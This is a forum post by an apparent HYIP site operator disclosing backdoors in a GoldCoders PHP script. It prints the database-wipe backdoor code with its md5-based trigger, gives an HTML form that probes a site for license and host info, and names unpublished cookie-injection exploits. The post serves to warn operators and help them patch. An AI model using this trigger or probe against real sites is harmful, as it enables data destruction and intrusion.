First of all a great **** to Goldcoders.
i was running a hyip site, everything was going smooth and suddenly everything zeroed
and then we saw how everyone was shouting here .. how many sites gone .. really dont know ..
so i decided to check that hyip script myself for the bugs/erros
and see what in less than one hour i found more than 20 bugs in their bull**** crap. the ******* GoldCoders themselves put the backdoor in it so that they can turn the game at any point what a lame act . and no not 1 not 2 a long list . the wholel script is full of this bull****
just to name a few
1. reset to zero backdoor
2. sql injections
3. aaa/ddd user probs
4. empty user probs
5. cookie injections
6. cookie injection , reset admin pass
7. cookie injection , get admin access
8. improper input checking on turing images . etc.
9. send info to GC servers (what a lame act)
and it continues ...
one of their most beautiful for which everyone please give em a clap was the reset db backdoor ..
well the decoded script which is being used by many hyips is easy to patch at least remove the following lines to ensure that nobody will be able to crash the db
open the file index.php , search for the following code and then just comment out it be putting /* */ around it
like this
Code:
/*
if (($frm['a'] == 'register' AND $frm_env['REQUEST_METHOD'] == 'POST'))
{
$string = $settings['license'] . $frm_env['HTTP_HOST'] . date ('d') . date ('Y') . date ('m');
if ($frm['string'] == md5 ($string))
{
$q = 'update hm2_users set came_from = \' \' where id = 1';
mysql_query ($q);
print '-';
if ($frm['string2'] == date ('d'))
{
$q = 'delete from hm2_history where type=\'withdrawal\'';
mysql_query ($q);
}
if ($frm['string2'] == date ('y'))
{
$q = 'delete from hm2_deposits';
mysql_query ($q);
$q = 'delete from hm2_emails';
mysql_query ($q);
$q = 'delete from hm2_history';
mysql_query ($q);
$q = 'delete from hm2_online';
mysql_query ($q);
$q = 'delete from hm2_plans';
mysql_query ($q);
}
db_close ($dbconn);
exit ();
}
}
*/
the ones which are using the zend encoded script .. hmm dont think this backdor is not present in it, IT IS
instead if anyone wants to quickly check whether their site is running a backdoor'ed script or not
open the notepad and type the following lines , replace your site with your own
Code:
<form method=post action=http://yoursite.com/index.php>
<input type=hidden name=a value=ver><br>
<input type=submit>
</form>
save the file as HTML open it in the browser and click the submit . if you get some info including the LICENSE , DATE and HOST NAME , then
your script is vulnerable
the PHP code which generates this info is just located above the one which i posted above smile.gif you may remove that as well
if you are using a proper licence from GC , ask those ***** to patch it before anyone else do it for you smile.gif
the un-licensed copies may have other backdoors inserted by different people , their distributers including sending an email containing your admin password account numbers etc.. and blah blah
use them at yoru own risk , never trust anyone
if you want to see at how many places their script sends back the notifications to their server search for check.cgi in the PHP files . a simple one is in config.inc.php
To GC programmers : what a great professionalism you have shown by inserting these little naughty pieces of code everywhere
create a new version now . encode it with something else . come on baby
To the admins who are running hyips from shared hostings . try to avoid it unless you are sure that nobody else can access your globally writeable settings.php file
Again to GC : lamers cannot you insert these settings in the DB as well instead of just 777 em and putting in the root directory so that others can enjoy , fair play
its enough now guys , i have some very nice exploits of it including the 0-day of cookie injection/get admin access prob , lemme play with it for a while .
Last: i am not that much lame to delete your dbs, if you want to remove these bugs and dont know the abc ask someone else .
i will not say that i am selling some SECURED script ,beware of these
and once again a great **** to GoldCoders , i suggest nobody will ever pay them a penny
HYIP Admins - MUST READ
Linear Mode
